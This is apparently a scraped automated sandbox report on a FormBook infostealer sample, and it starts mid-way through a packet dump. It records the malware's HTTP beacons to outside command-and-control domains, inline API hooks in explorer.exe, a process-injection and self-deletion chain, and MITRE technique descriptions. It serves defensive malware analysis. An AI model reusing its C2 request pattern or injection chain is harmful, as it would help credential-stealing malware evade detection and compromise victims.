61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65 Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rOHYb9Z6Wy9T1+v+/2OiI1DBd5wjCInqR5Zn6XhVNf2Hb9ATyIElVxP9iU+iEhAeHIpde7JKlMccR/geMyf+aw=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)\|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49765	3.234.181.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 17:09:53.431937933 CET	4843	OUT	GET /wdva/?YP7HsZXp=aeYSUm77/4pN8ZT/uXkxszyZjPiqX70cnyvz0SpaHLBaMQqGqlwCHFzYALKMdCUG+bHZ&CTvp=fvUh_lYhi2Qtqn HTTP/1.1 Host: www.milkandmemories.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 26, 2021 17:09:53.559004068 CET	4844	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Tue, 26 Jan 2021 16:08:59 GMT Connection: close Content-Length: 5044 Data Raw: 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 64 38 64 38 64 38 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 42 72 6f 77 73 65 72 45 72 72 6f 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 20 39 32 32 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 68 61 64 6f 77 5f 6c 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 2f 2a 2e 73 68 61 64 6f 77 5f 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 30 70 78 3b 7d 2a 2f 0d 0a 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 5f 62 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 7d 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 20 30 20 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 7d 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 2e 68 65 61 64 65 72 53 68 6f 72 74 7b 68 65 69 67 68 74 3a 20 36 35 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 69 6e 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 34 70 78 3b 68 65 69 67 68 74 3a 20 31 34 35 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 5f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 74 6f 70 7b 68 65 69 67 68 74 3a 20 36 35 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 0d 0a 20 20 20 20 20 20 20 20 23 6c 6f 67 6f 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 5f 6f 66 66 2e 67 69 66 29 20 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 20 32 32 35 70 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body{background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x;} .pageBrowserError{min-height: 600px;} .container{margin: 0 auto;width: 922px;} .shadow_l{margin-left: 10px;} /.shadow_r{margin-right: 10px;}/ .main_bg{background: #fff;} #header{padding: 0 2px;background: #fff;} #header.headerShort{height: 65px;} #header .header_in{padding-right: 14px;height: 145px;overflow: hidden;background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x;} #header .header_top{height: 65px;overflow:hidden} #logo {background: url(https://www.namebrightstatic.com/images/logo_off.gif) no-repeat;width: 225p

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49766	216.24.179.55	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 17:10:14.173506021 CET	4849	OUT	GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=hK2+H65jJ6ehVdA52W/5RiHO6KAeaXXnYMVt3i9x6BH/1kcuoogx/NrTS0USn7suDUfO HTTP/1.1 Host: www.monalizacos.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 26, 2021 17:10:14.359316111 CET	4849	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 26 Jan 2021 16:10:14 GMT Content-Type: text/html Content-Length: 162 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xEA
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xEA
GetMessageW	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xEA
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xEA

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: 4NoiNHCNoU.exe PID: 6340 Parent PID: 5884

General

Start time:	17:07:36
Start date:	26/01/2021
Path:	C:\Users\user\Desktop\4NoiNHCNoU.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\4NoiNHCNoU.exe'
Imagebase:	0xd20000
File size:	770560 bytes
MD5 hash:	204E0BF841B9900FA03D6DFF302857F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: AddInProcess32.exe PID: 6436 Parent PID: 6340

General

Start time:	17:07:42
Start date:	26/01/2021
Path:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase:	0xfa0000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: explorer.exe PID: 3424 Parent PID: 6436

General

Start time:	17:07:47
Start date:	26/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: autoconv.exe PID: 5752 Parent PID: 3424

General

Start time:	17:07:59
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0x1e0000
File size:	851968 bytes
MD5 hash:	4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: help.exe PID: 6840 Parent PID: 3424

General

Start time:	17:07:59
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\help.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\help.exe
Imagebase:	0x1390000
File size:	10240 bytes
MD5 hash:	09A715036F14D3632AD03B52D1DA6BFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 6768 Parent PID: 6840

General

Start time:	17:08:03
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6748 Parent PID: 6768

General

Start time:	17:08:03
Start date:	26/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 4NoiNHCNoU.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre